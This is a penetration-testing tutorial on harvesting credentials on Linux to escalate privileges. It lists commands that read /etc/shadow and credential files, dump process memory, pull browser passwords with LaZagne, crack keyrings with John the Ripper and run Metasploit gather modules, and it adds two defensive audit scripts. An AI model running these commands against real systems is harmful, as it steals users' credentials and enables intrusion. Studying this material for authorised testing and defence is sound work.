Linux Privilege Escalation – Credentials Harvesting
Introduction
Linux-based operating systems and applications often store clear text, encoded or hashed credentials in files or in memory.
When gaining initial access to a Linux machine and performing privilege escalation enumeration, passwords can often be found through these means and then used to escalate privileges further.
There are various methods to harvest credentials on a Linux system in order to escalate privileges; the following are the most common and are always worth a try.
Finding passwords in files
One of the first things to do is to search for files containing the “password” or “passwd” string, or configuration files containing authentication information, as this could help in identifying hidden credentials:
- grep --color=always -rnw '/' -ie "PASSWORD\|PASSWD" 2> /dev/null
- find . -type f -exec grep -i -I "PASSWORD\|PASSWD" {} /dev/null \;
- locate config.php
- locate password; locate passwd
- cat /var/mail/*; cat /var/spool/mail/*
- locate config.
- crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron; cat /etc/cron; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny; cat /etc/crontab; cat /etc/anacrontab; cat /var/spool/cron/crontabs/root
Bash History
Bash and other scripting languages, along with various services often store previous commands run in the system, which could contain clear-text or encoded passwords if they are hard-coded in the command itself:
- find / -name "*_history" -xdev 2> /dev/null
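A defender-side check for the exposure described above: scan shell-history lines for commands that embed a credential (password flags, user:password pairs, secret-looking variable assignments) and show the redacted form that should replace them. This is an added example, not code from the original article; the history lines are constructed and the pattern list is an assumption to extend for the tools in use on a given host.

```python
"""Flag shell-history lines that carry a credential in the command itself."""
import re

REDACTED = "<REDACTED>"

# Each pattern captures the secret in a group named 'secret'.
# Assumed set: extend for the tools actually used on the host.
PATTERNS = [
    # mysql -pSecret / --password=Secret (flag glued to the value)
    re.compile(r"(?<=\s)(?:-p|--password=)(?P<secret>\S+)"),
    # curl -u user:pass, --user user:pass, or user:pass@ in a URL
    re.compile(r"(?:-u |--user |://)[^\s:@/]+:(?P<secret>[^\s@]+)"),
    # KEY=value assignments for common secret variable names
    re.compile(r"(?:PASSWORD|PASSWD|SECRET|TOKEN)=(?P<secret>\S+)", re.I),
]

# Constructed sample history (not from a real host).
SAMPLE_HISTORY = """\
ls -la /var/www
mysql -u root -pSup3rS3cret! shopdb
curl -u admin:Hunter2 https://intranet.example/api
export DB_PASSWORD=changeme
git pull origin main
"""


def redact(line):
    """Return (found, redacted_line) with every matched secret replaced.
    Matches are replaced from the end so earlier offsets stay valid."""
    found = False
    for pat in PATTERNS:
        for m in reversed(list(pat.finditer(line))):
            found = True
            line = line[:m.start("secret")] + REDACTED + line[m.end("secret"):]
    return found, line


def scan_history(text):
    """Return [(line_number, redacted_command)] for each leaking line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        found, clean = redact(line)
        if found:
            hits.append((n, clean))
    return hits


if __name__ == "__main__":
    for n, clean in scan_history(SAMPLE_HISTORY):
        print(f"line {n}: {clean}")
```

On a real host, feed it the contents of each `*_history` file found by the command above; the redacted lines double as a guide to what users should be told to stop typing.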
Check for Hashes Stored in Passwd/Shadow
The /etc/passwd file used to store user password hashes, but it no longer does: these are now kept in the /etc/shadow file. The change was made because some of the information in /etc/passwd has to be world-readable for the operating system to work correctly, so the hashes were moved to the shadow file, which is normally readable only by root. Hashes may still be present in /etc/passwd, as the format is backward compatible.
- find / -name passwd -xdev 2>/dev/null; find / -name shadow -xdev 2>/dev/null
- cat /etc/passwd; cat /etc/shadow
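An audit for the two weaknesses this section describes: a hash (or an empty password field) left in a passwd-format entry, and a shadow file whose mode lets other users read it. This is an added example, not from the original article; the sample entries are constructed, and on a real host the functions would be fed /etc/passwd and the `st_mode` of /etc/shadow.

```python
"""Audit passwd-format entries and shadow file permissions."""
import stat

# Password-field values that mean "no hash stored in this file".
NO_HASH_MARKERS = {"x", "*", "!", "!!"}

# Constructed sample: legacy_svc still carries a hash in passwd itself,
# guest has an empty password field. The hash is a placeholder.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
legacy_svc:$6$saltsalt$HASHPLACEHOLDER:1001:1001::/srv/legacy:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""


def audit_passwd(text):
    """Return (user, issue) pairs for entries whose password field is not a
    placeholder: a hash readable by everyone, or no password at all."""
    findings = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) < 7:
            findings.append((raw, "malformed entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in NO_HASH_MARKERS:
            findings.append((user, "hash stored in passwd"))
    return findings


def shadow_mode_ok(mode):
    """/etc/shadow (and /etc/security/opasswd) must not be readable by
    'other'; pass os.stat(path).st_mode on a live system."""
    return (mode & stat.S_IROTH) == 0


if __name__ == "__main__":
    for user, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{user}: {issue}")
    print("0640 ok:", shadow_mode_ok(0o640), " 0644 ok:", shadow_mode_ok(0o644))
```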
Old passwords in /etc/security/opasswd
The /etc/security/opasswd file is used by pam_cracklib (a module used in Linux to ensure a good password policy is in place) to store the hashed version of old passwords used on the system to prevent users from reusing the same ones over and over again.
- cat /etc/security/opasswd
- find / -name opasswd -xdev 2>/dev/null
Recently Modified Files
It can be useful to check files that were modified recently, as they may contain useful information and/or credentials. The following command finds standard files modified in the last 30 minutes:
- find / -mmin -30 -xdev 2>/dev/null
Credentials Stored in Memory
Services will sometimes store the credentials entered by the end user in clear text in memory. The commands below can help find credentials stored in processes:
- strings -n 10 /dev/mem | grep -iE "PASSWORD|PASSWD" --color=always
or with GDB:
- ps -ef | grep [service name] (find the process id)
- gdb -p [process id]
- info proc mappings (note the start and end addresses of the region to dump)
- dump memory /tmp/process <START_HEAD> <END_HEAD>
- q
- strings /tmp/process
You can also use the following tools to dump the system memory and find clear-text credentials stored within it:
Credentials Stored in Browsers
Browsers such as Google Chrome, Firefox, Microsoft Edge etc. often store passwords when authentication to a website is performed. LaZagne is an open source application used to retrieve passwords stored on a local computer, and one of its many functions is to retrieve passwords stored in internet browsers.
| Command | Description |
| --- | --- |
| laZagne.py all | Launch all modules |
| laZagne.py browsers | Launch only a specific module |
| laZagne.py browsers -firefox | Launch a specific software script |
| laZagne.py -h; laZagne.py browsers -h | Get help |
| laZagne.py all -vv | Change verbosity mode (2 different levels) |
GNOME Keyring
GNOME Keyring is a software application designed to store security credentials such as usernames, passwords, and keys. The sensitive data is encrypted and stored in a keyring file in the user’s home directory. It can be found through the following command:
- locate login.keyring; locate user.keystore
John the Ripper can then be used to extract and crack the hashes and reveal the actual password:
- /usr/share/john/keyring2john.py login.keyring > hashes.txt
- /usr/share/john/keystore2john.py user.keystore >> hashes.txt
- john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
MimiPenguin and the post/linux/gather/gnome_keyring_dump Metasploit module can also be used to perform this task.
Additional Metasploit Modules
There are several Metasploit modules that aim to find clear-text or encoded credentials on a target system:
- use post/linux/gather/enum_system
- use post/linux/gather/enum_users_history
- use post/linux/gather/gnome_commander_creds
- use post/linux/gather/hashdump
- use post/linux/gather/gnome_keyring_dump
- use post/linux/gather/enum_psk
- use post/linux/gather/enum_configs
- use post/linux/gather/ecryptfs_creds
- use post/linux/gather/mount_cifs_creds
- use post/linux/gather/openvpn_credentials
- use post/linux/gather/phpmyadmin_credsteal
- use post/linux/gather/pptpd_chap_secrets
- use post/linux/gather/tor_hiddenservices
- use post/multi/gather/filezilla_client_cred
- use post/multi/gather/firefox_creds
- use post/multi/gather/gpg_creds
- use post/multi/gather/grub_creds
- use post/multi/gather/irssi_creds
- use post/multi/gather/lastpass_creds
- use post/multi/gather/maven_creds
- use post/multi/gather/netrc_creds
- use post/multi/gather/pgpass_creds
- use post/multi/gather/pidgin_cred
- use post/multi/gather/remmina_creds
- use post/multi/gather/rsyncd_creds
- use post/multi/gather/ssh_creds
- use post/multi/gather/thunderbird_creds
Conclusion
Exposed passwords are a very common route to intrusion and privilege escalation; although they are not as common nowadays, since most applications encrypt stored credentials, they are something that should not be overlooked.
Automated enumeration scripts will also perform credential harvesting although it’s always best to do this manually.